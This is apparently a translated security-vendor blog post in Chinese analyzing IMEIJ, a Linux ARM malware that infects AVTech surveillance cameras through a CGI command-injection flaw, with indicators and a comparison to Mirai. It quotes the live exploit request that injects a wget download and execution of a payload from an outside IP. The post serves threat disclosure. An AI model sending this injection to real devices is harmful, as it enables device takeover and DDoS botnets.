攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。

AVTech 有許多連上網際網路的裝置都可能感染這個新的 Linux 惡意程式,包括:IP 攝影機、監視錄影設備,以及支援 AVTech 雲端服務的網路錄影機。一旦惡意程式安裝到裝置上,它就能蒐集裝置的系統資訊和網路活動資料。此外,它還可執行遠端駭客所下的指令,發動分散式阻斷服務攻擊 (DDoS)攻擊,然後自行停止。受感染的裝置還可能讓同一網路上的其他裝置陷入危險。

IMEIJ 有三個下載網址,分別位於兩家不同的 ISP:

  • hxxp://172.247.116.3:8080/Arm1
  • hxxp://172.247.116.21:85/Arm1
  • hxxp://192.154.108.2:8080/Arm1

以上 IP 都是屬於南韓的 ISP 所有。

根據 Search-Lab 指出,目前網際網路上可搜尋到的 AVTech 裝置數量超過 13 萬台,這些裝置都有可能成為這項攻擊的目標。此外,這些裝置還可能變成殭屍電腦,讓駭客發動大規模 DDoS 攻擊。如同大多數連網裝置一樣,這些受害裝置出廠時就缺乏足夠的安全性,而且無法直接監控。

IMEIJ 的 DDoS 攻擊能力或許會讓人聯想到 Mirai,但兩者之間有些差別:

MIRAIIMEIJ
受害裝置  多樣AVTech
使用的連接埠7547
5555
48101
39999
攻擊方式經由猜測密碼的方式登入使用 BusyBox 軟體的裝置駭客利用不安全的 CGI 程式來安裝 IMEIJ 惡意程式

IMEIJ 是最近發現的多個 ARM 平台 Linux 惡意程式之一。ARM 是物聯網和行動裝置廣泛採用的平台,也是駭客攻擊這類裝置必備的技能之一。近期發現的 Linux 惡意程式除了 IMEIJ 之外還有 Umbreon Rootkit (趨勢科技命名為 ELF_UMBREON) 以及 LuaBot (趨勢科技命名為 ELF_LUABOT)。

趨勢科技PC-cillin雲端版能有效防範這項威脅,在端點裝置上偵測惡意程式。若要保護連網的裝置,可採用趨勢科技 Home Network Security 來檢查路由器和連線裝置之間的網路流量。企業機構則可採用趨勢科技的Deep Discovery Inspector網路裝置來監控所有連接埠及 105 種以上的網路通訊協定以偵測進階威脅和針對性攻擊。

IMEIJ 的 SHA256 雜湊碼如下:

8040422762138d28aa411d8bb2307a93432416f72b292bf884fb7c7efde9f3f5

原文出處:New Linux Malware Exploits CGI Vulnerability 作者:Jeanne Jocson 和 Jennifer Gumban